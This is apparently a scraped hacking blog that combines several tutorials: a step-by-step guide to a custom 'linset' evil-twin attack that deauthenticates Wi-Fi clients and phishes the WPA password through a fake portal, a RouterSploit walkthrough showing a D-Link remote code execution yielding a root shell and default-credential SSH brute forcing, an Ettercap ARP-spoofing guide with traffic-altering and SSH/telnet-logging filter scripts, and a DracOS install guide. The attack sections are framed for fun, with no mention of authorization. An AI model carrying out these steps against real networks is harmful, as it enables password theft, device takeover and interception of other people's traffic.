WHAT'S NEW?
Loading...
custom linset

 Today, I'd like to share my own custom linset, I've use this so long cause this is more efficient and saving time. Also this custom linset has a multi language web interfaces, until now, this customize linset supporting several languages, such as : English, Spanish, Italy, French, Portuguese, and Indonesian. I add an English and Indonesian because my region is both in English and Indonesian environment. Actually, you can customize yourselves to add more web interface languages, or another features.

If you wonder what is linset is, I think you've know this powerful tool to set an evil-twin AP attack written in bash. Linset features, support DHCP, FakeDNS server with redirect fake AP etc) it has a bunch of dependencies, and originally it’s in Spanish. But other than that, it’s pretty cool.

In this custom linset version, I mentioned above, it's more efficient cause it saving time so much, which mean that, it has a feature that it detect the dependencies, and auto install it, if you're using Kali Linux or other pentest OS's this feature will work flawlessly. Instead if it given an error output, it can be cause of the external problem, such as an incorrect repository, etc.

How Linset Work ! 

Linset actually set a fake AP by duplicate the ESSID, BSSID, and it's channel too of the target network. You dont even need any internet connection or wordlists. Since, the Evil-Twin AP doesn't perform any bruteforce at all. Instead, again it act like an original network, without the knowing of the particular target.
  • Scan the networks.
  • Select network.
  • Capture handshake (can be used without handshake)
  • Choose one of several web interfaces
  • Mounts one FakeAP imitating the original
  • A DHCP server is created on FakeAP
  • It creates a DNS server to redirect all requests to the Host
  • The web server with the selected interface is launched
  • The mechanism is launched to check the validity of the passwords that will be introduced
  • It deauthentificate all users of the network, hoping to connect to FakeAP and enter the password.
  • The attack will stop after the correct password checking.

STEP 1 : Giving Permission to Linset

After you download this custom Linset, which the link is provided in the end of this article, and extract it. Then, you need to giving custom linset and custom airmon-ng an executable permission.

Custom Linset Airmon-ng

giving permission Custom Linset Airmon-ng

 STEP 2 : Run Custom Linset 

When you run Linset for the first time, it'll check required dependencies and install missing dependencies automatically. If all dependencies is complete, then you will be prompt in the setup session.

Custom Linset Airmon-ng

STEP 3 : Select The Interface

It's doesn't necessary to use multi interfaces, since this custom linset also has a custom airmon-ng which is the older version of aircrack-ng that support multi interface mode on one interface.

Custom Linset Airmon-ng

STEP 4 : Select Channel 

If you have any mind of what channel you should run, then choose all channels instead.

Custom Linset Airmon-ng select channel

STEP 5 : Scan the Network 

In this step, linset will dump all network captured around, press CTRL + C to interrupt the scan once you find your target network was captured, and make sure that on target network, there is (are) a client connected. You may need to know more about airodump-ng in .....

Custom Linset Airmon-ng scan network

STEP 6 : Select Target

Select your target, notice that if a certain network has a clients connected than linset will adding an asterisk symbol on it's number.

Custom Linset Airmon-ng selet target

STEP 7 : Select Mode of Fake AP

This will configure which method of linset should use to configure an Evil Twin AP. But, I recommended using Hostapd.

Custom Linset Airmon-ng configure fake ap

STEP 8 : Capture or Select Handshake file

In this step, you gonna asked for a handshake file, usually in ***.cap file extension. If you haven't handshaked yet then just press ENTER and caputer live handshake via linset.

Custom Linset Airmon-ng handshake

STEP 8 : Select Type of Checking Handshake

I recommend use strict method, but do not mean I prohibit You to use other method.

Custom Linset Airmon-ng handshake

STEP 9 : Select The Deauth Clients Method

Since the handshaking need to deauth the client first to capture it handshake, then if you need to be more efficient choose option 3 to perform deauth specifies the target AP.

Custom Linset Airmon-ng deauth method 

Custom Linset Airmon-ng handshake

STEP 10 : Verify Handshake !!!

Don't miss this step, You will notice the two Xterm window which each are an airodump-ng to capture the handshake and the deauth progress window. You don't need to close each window. If you noticed a WPA Handshake and followed by an BSSID mac address on the top of Airodump-ng windows then in the main window or terminal of linset input the verify and continue option. Once the handshake is verified, the airodump-ng terminal window will terminated automatically.

Custom Linset Airmon-ng verify handshake

STEP 11 : Select Web Interface And Language

There is only one option that is "Neutral web interface", then select the appropriate language interface you desired.

Custom Linset Airmon-ng select web interface and language

select indonesian Custom Linset Airmon-ng

STEP 12 : Lay down your shoulder and take a coffee 

Seriously !!!  This is the final step, actually, here, you need to be more patient, waiting for clients of certain target network to connect to our fake AP or Evil Twin. I will not gonna explain more on this step. just try it and have fun.



Custom Linset Airmon-ng
FAKE AP INFO
DHCP SERVER Custom Linset Airmon-ng
DHCP SERVER

Custom Linset Airmon-ng FAKE DNS SERVER
FAKE DNS SERVER


Custom Linset Airmon-ng deauth target
Deauth using mdk3
Output image taken from target devices.
In Windows 7 :

 






On android :

Sign in required


Victim was brought to fake authentication page



When the attack Succeed !!! See the output result file :

Custom Linset Airmon-ng succeed

DOWNLOAD CUSTOM LINSET 

Via Google Drive

RouterSploit - Router Exploitation Framework
RouterSploit - Router Exploitation Framework
 
The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices. RouterSploit currently only supports limited number of exploits out of the box but they can be extended from popular exploit database sites online. Creating Routesploit modules is very easy so that everyone can contribute to this excellent project.  Full process is described in RouterSploit Wiki.  In the wiki you can find a code skeleton and all the necessary classes for module development. Detailed process of creating RouterSploit modules is described through a very helpful example. Hopefully, over time, and through public contribution, this promising project will grow to become one of the best tools for home router security auditing. RouterSploit consists of various modules that aids penetration testing operations:

  • Exploits - modules that take advantage of identified vulnerabilities.
  • Creds - modules designed to test credentials against network services.
  • Scanners - modules that check if target is vulnerable to any exploit.

RouterSploit Installation


$ apt-get install python-requests python-paramiko python-netsnmp
$ git clone https://github.com/reverse-shell/routersploit

Install RouterSploit - Router Exploitation Framework
Install RouterSploit and Dependencies

Install dependencies RouterSploit - Router Exploitation Framework

Install or cloning via Github RouterSploit

Update


Update RouterSploit Framework often. Project is under heavy development and new modules are shipped almost everyday.

$ cd routersploit
$ git pull


RouterSploit Usage

RouterSploit - Router Exploitation Framework

1. Exploits

Pick the module

rsf > use exploits/
exploits/2wire/     exploits/asmax/     exploits/asus/      exploits/cisco/     exploits/dlink/     exploits/fortinet/  exploits/juniper/   exploits/linksys/   exploits/multi/     exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >


U can use tab key for completion.

Options


Display module options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show options 

Target options:

Name Current settings Description 
---- ---------------- ----------- 
target                Target address e.g. http://192.168.1.1 
port       80         Target Port

show options routersploit
Show More Options


Set options:

rsf (D-LINK DIR-300 & DIR-600 RCE) > set target http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Run module


Exploiting target can be achieved by issuing 'run' or 'exploit' command:

rsf (D-LINK DIR-300 & DIR-600 RCE) > run
[+] Target is vulnerable
[*] Invoking command loop...
cmd > whoami
root


It is also possible to check if the target is vulnerable to particular exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > check
[+] Target is vulnerable


Info


Display information about exploit:

rsf (D-LINK DIR-300 & DIR-600 RCE) > show info

Name:
D-LINK DIR-300 & DIR-600 RCE

Description:
Module exploits D-Link DIR-300, DIR-600 Remote Code Execution vulnerability which allows executing command on operating system level with root privileges.

Targets:
- D-Link DIR 300
- D-Link DIR 600

Authors:
- Michael Messner <devnull[at]s3cur1ty.de> # vulnerability discovery
- Marcin Bury <marcin.bury[at]reverse-shell.com> # routersploit module

References:
- http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router
- http://www.s3cur1ty.de/home-network-horror-days
- http://www.s3cur1ty.de/m1adv2013-003


2. Creds


Modules located under creds/ directory allow running dictionary attacks against various network services.

Following services are currently supported:

  • ftp
  • ssh
  • telnet
  • http basic auth
  • http form auth
  • snmp

Every service has been divided into two modules:
  1. default (e.g. ssh_default) - this kind of modules use one wordlist with default credentials pairs login:password. Module can be quickly used and in matter of seconds verify if the device uses default credentials.
  2. bruteforce (e.g. ssh_bruteforce) - this kind of modules perform dictionary attacks against specified account or list of accounts. It takes two parameters login and password. These values can be a single word (e.g. 'admin') or entire list of strings (file:///root/users.txt).

Console output:

rsf > use creds/ssh_default 
rsf (SSH Default Creds) >

Options


rsf (SSH Default Creds) > show options

Target options:

rsf (SSH Default Creds) > show options

Target options:

   Name       Current settings     Description           
   ----       ----------------     -----------           
   target                          Target IP address     
   port       22                   Target port           


Module options:

   Name         Current settings              Description                                              
   ----         ----------------              -----------                                              
   threads      8                             Numbers of threads                                       
   defaults     file:///path/defaults.txt     User:Pass or file

Set target:


rsf (SSH Default Creds) > set target 192.168.1.53
[+] {'target': '192.168.1.53'}


Run module


rsf (SSH Default Creds) > run
[*] Running module...
[*] worker-0 process is starting...
[*] worker-1 process is starting...
[*] worker-2 process is starting...
[*] worker-3 process is starting...
[*] worker-4 process is starting...
[*] worker-5 process is starting...
[*] worker-6 process is starting...
[*] worker-7 process is starting...
[-] worker-4 Authentication failed. Username: '3comcso' Password: 'RIP000'
[-] worker-1 Authentication failed. Username: '1234' Password: '1234'
[-] worker-0 Authentication failed. Username: '1111' Password: '1111'
[-] worker-7 Authentication failed. Username: 'ADVMAIL' Password: 'HP'
[-] worker-3 Authentication failed. Username: '266344' Password: '266344'
[-] worker-2 Authentication failed. Username: '1502' Password: '1502'
(..)

Elapsed time:  38.9181981087 seconds
[+] Credentials found!

Login     Password     
-----     --------     
admin     1234         

rsf (SSH Default Creds) > 


3. Scanners


Scanners allow quickly verify if the target is vulnerable to any exploits.

Pick module


rsf > use scanners/dlink_scan
rsf (D-Link Scanner) > show options

 Options


Target options:

Target options:

   Name       Current settings     Description                                
   ----       ----------------     -----------                                
   target                          Target address e.g. http://192.168.1.1     
   port       80                   Target port                                


Set target:


rsf (D-Link Scanner) > set target 192.168.1.1

[+] {'target': '192.168.1.1'}


Run module


rsf (D-Link Scanner) > run

[+] exploits/dlink/dwr_932_info_disclosure is vulnerable
[-] exploits/dlink/dir_300_320_615_auth_bypass is not vulnerable
[-] exploits/dlink/dsl_2750b_info_disclosure is not vulnerable
[-] exploits/dlink/dns_320l_327l_rce is not vulnerable
[-] exploits/dlink/dir_645_password_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_615_info_disclosure is not vulnerable
[-] exploits/dlink/dir_300_600_rce is not vulnerable

[+] Device is vulnerable!

 - exploits/dlink/dwr_932_info_disclosure


It has been verified that target is vulnerable to dwr_932_info_disclosure exploit. Now use proper module and exploit target.

rsf (D-Link Scanner) > use exploits/dlink/dwr_932_info_disclosure
rsf (D-Link DWR-932 Info Disclosure) > set target 192.168.1.1
[+] {'target': '192.168.1.1'}
 
rsf (D-Link DWR-932 Info Disclosure) > exploit
[*] Running module...
[*] Decoding JSON value
[+] Exploit success
Recommended Articles Related to Wireless Penetration Testing & Kali Linux:
Ettercap is a free and open source tool suite for man in the middle attacks on LAN. Ettercap works by putting the network interface into promiscuous mode and by ARP poisoning the target machines. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis. For downloads and more information. Today we are gonna having fun with one of Ettercaps feature, that is Etterfilter. Etterfilter basically, let us create a custom filter, like we are gonna touch here.

Ettercap arp spoofing etterfilter ironbugs.com
ARP Spoofed victim

ARP SPOOFING ?

ARP (Address Resolution Protocol) spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks.

The attack can only be used on networks that use the Address Resolution Protocol, and is limited to local network segments.
The basic principle behind ARP spoofing is to exploit the vulnerabilities in the ARP protocol by sending spoofed ARP messages onto the LAN. ARP spoofing attacks can be run from a compromised host on the LAN, or from an attacker's machine that is connected directly to the target LAN.

Generally, the goal of the attack is to associate the attacker's host MAC address with the IP address of a target host, so that any traffic meant for the target host will be sent to the attacker's host. The attacker may choose to inspect the packets (spying), while forwarding the traffic to the actual default gateway to avoid discovery, modify the data before forwarding it (man-in-the-middle attack), or launch a denial-of-service attack by causing some or all of the packets on the network to be dropped.

ETTERFILTER ?

Etterfilter utility is used to compile source filter files into binary filter files that can be interpreted by the JIT interpreter in the ettercap filter engine. You have to compile your filter scripts in order to use them in ettercap. All syntax/parse errors will be checked at compile time, so you will be sure to produce a correct binary filter for ettercap.

ARP SPOOFING Demos (Using EtterFilter)

In this demo, we will use arp spoofing to replace some tags (images) in a victim requests just for fun or prank your friends :)) .

STEP 1 : Create a Custom Filter Script

First, create a new folder or directory to store our filter.

Make a directory for etterfilter

Open your favorite text editor and name the file with ".filter" extension.

Etterfilter script


Here is a custom filter script, to replace the img tag in a html code :

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      msg("[*] Sucked Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://3.bp.blogspot.com/-PfUQyJkxonE/VuHd2m2N-zI/AAAAAAAAAnc/clq0g6rIHQ0/s1600-r/ironbugs-kusayang.png\" ");
   msg("[+] Replace tag launched
\n");

That script designed to replace the img tag of any html, to the given destination URL. Save it, and make sure the script is in the folder we recently created before.

Ettercap arp spoofing etterfilter script code

STEP 2 : Compile The Custom Script 

To compile the custom filter script, use the following etterfilter command pattern :

etterfilter [filterscript.filter] -o [outputfilter.ef]


Compile the code

STEP 3 : Enable IP_Forward 

Enable the ip_forward with the following command :

echo 1 > /proc/sys/net/ipv4/ip_forward

By default the value of ip_forward is '0' (disable) make sure to change the value to '1' (enable).

Enable ip forward

STEP 4 :  Run Ettercap ARP Spoofing With Custom Etterfilter


ettercap -T -q -i [interface] -F [filter file] -M ARP /[Target IP]/ /[Gateway IP]/

If you want to ARP Spoofing all target in network, you do not need to add the "// //" to specify the target.

-T, to run in text-only mode (CLI)
-q, quite mode, display less verbose output
-i, interface name
-F, specify the filter name
-M, mitm method to use

Run ettercap

Output result, taken from target machine :

ARP Spoofed target machine

Another output result taken from irongeek.com

img source irongeek.com

img source irongeek.com

Another custom filter

Below are examples of another custom filter. You can modify or add to make a complex filter.

# Display a message if the tcp port is 22

if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}

# Log all telnet traffic, also execute ./program on every packet

if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}

# Log all traffic except http

if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}

# Some operation on the payload of the packet

if ( DATA.data + 20 == 0x4142 ) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}

# Drop any packet containing "ettercap"

if (search(DECODED.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
   kill();
}

# Log ssh decrypted packets matching the regexp

if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}

# Dying packets

if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}

# The same for IPv6 but make sure we really see IPv6 packets doing such trivial tests

if (eth.proto == IP6 && ipv6.hl < 5) {
   msg("The IPv6 packet will die soon\n");
}

# String comparison at a given offset

if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}

# Inject a file after a specific packet

if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}

# Replace the entire packet with another

if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}

# Modifying binary data by using external commands

if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) {
   log(DATA.data, "/tmp/payload");
   drop();
   execinject("/bin/sed 's/\x03com\x00/\x02my\x04page\x02de\x00/g' /tmp/payload");
   udp.len += 7;
   exec("/bin/rm /tmp/payload");
   msg("faked");
}

# Filter only a specific ip address

if (ip.src == '192.168.0.2') {
   drop();
}

# Do the same for IPv6

if (ipv6.src == '2001:db8::1') {
   drop();
}

# Combined both IPv4 and IPv6

if (eth.proto == IP && ip.dst == '192.168.0.2') {
   msg("drop IPv4");
   drop();
}
if (eth.proto == IP6 && ipv6.dst == '2001:db8::1') {
   msg("drop IPv6");
   drop();
}

# Translate the port of the tcp packet from 80 to 81

if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}

# Identify and mangle ESP packets

if (ip.proto == ESP) {
   DATA.data = "DEADDECAF";
}


Recommended Articles Related to Penetration Testing:
ParanoicScan VUlnerabilty Scanner

Paranoicscan, is more powerful hacker-mate vulnerability assessment tool .

Paranoicscan Features Lists

  • XSS
  • SQL GET / POST
  • SQL GET
  • SQL GET + Admin
  • Directory listing
  • MSSQL
  • Jet Database
  • Oracle
  • LFI
  • RFI
  • Full Source Discloure
  • HTTP Information
  • SQLi Scanner
  • Bypass Admin
  • Exploit FSD Manager
  • Paths Finder
  • IP Locate
  • Crack MD5
  • Panel Finder
  • Console
  • Generate all logs in a html file
  • Incorporates random and new user agent
  • Multi encoder / decoder :
    * Ascii
    * Hex
    * Url
    * Bin To Text & Text To Bin
  • PortScanner
  • HTTP FingerPrinting
  • CSRF Tool
  • Scan XSS
  • Generator for XSS Bypass
  • Generator tiny url links to
  • Finder and downloader exploits on Exploit-DB
  • Mysql Manager
  • Tools LFI

 Paranoicscan Video Tutorial


Paranoicscan Download

Recommended Articles Related to Penetration Testing:

Installing dracos in the your HDD, actually is not so hard nor so easy. In the last article I've posted a tutorial about how to install DracOs Linux using rsync. Because, just what I mentioned before in the last article, dracos has not a grub package. Thus, make DracOs Linux can't be installed directly to your harddisk become a primary OS. Instead, you need another primary linux OS which is already installed in your harddisk.

Since DracOS Linux final was released few days ago, some may having trouble how to install DracOs on a machine. In this case, we have two options or methods of installing dracOs in our machine. That are, install dracOs by using rsync, or by using regular installation via live CD. Thus, two options still can't installed independently as I mentioned the reason above. In this tutorial, I assume you have an empty partition of minimum 15 GB in your HDD with EXT4 device type. I assign that empty partition as /dev/sda7. After you've downloaded the .iso file and burned into CD with your way, then follow the following steps below.

What You Need

Ok, So now follow the steps carefully.

 STEP 1 : Booting The DracOs Linux From Live CD

I skip the step on how to burn the .iso file into CD, cause, i know that you're an advance pentesters already :). In the first booting select Run from live CD. Then you will be prompted a username an password form login. If you familiar with backtrack than you may should not worry about that,. If don't then, input the username and password form as root : toor . Then type startx

Booting Dracos

 STEP 2 : Open The Terminal And Ready To Go 

DracOs Linux using the URXvt Terminal, if you had any experience with Arch Linux, yeah thats it. To open the Terminal press " Windows + Shift + Enter  "

 STEP 3 : Run Installation Setup

Now,  type in the terminal :
$ install-dracos
You will see the dracOs installer figured out on below image. then hit Enter on <Install> menu

dracos installer

 STEP 4 :  Setup Partition

We have already an empty partition before, that is on /dev/sda7 as I mentioned above. If you have any doubts, hit Enter on the <list> menu. It is a good way to recheck your partition correctly, just to make sure. Now, type manually the partition device in the form. Then hit <OK>

Setip partition


Setup Partition form
Set dracOs Linux partition

The installer will ask you to verify the destinantion of your partition. If you have any doubts again just press <cancel> and rerun the step 4. If you have make sure, then hit <Yes> .

Run installer


STEP 5 : Set The Hostname

By default, the hostname of the DracOs Linux is 'dracOs'. You can change it as you deserved. Then hit <OK> and the installer ready to go installing DracOs Linux to your machine.

Dracos Hostname



STEP 6 : Installing Process

This installing process spend a lot of times, depend on your hardware specification. In the regular or standard spec of computers it can take for about 9 or 15 minutes. It can be less or more, in some machine.

Installing process

STEP 7 : No Grub !!!

Once the installing process is done, it will ask you whether you desire to install grub or not. Because dracOs Linux still under development and has many bugs inside. The developer were not recommend the user to install grub. Just ignore the grub option, we will do this in our primary linux machine.

Dont install grub in dracos


STE 8 : Reboot. Update Primary Linux Grub

Now, boot into your primary linux machine and then update the grub. thats it. Finished.

Done installation

Recommended articles related to DracOs Linux :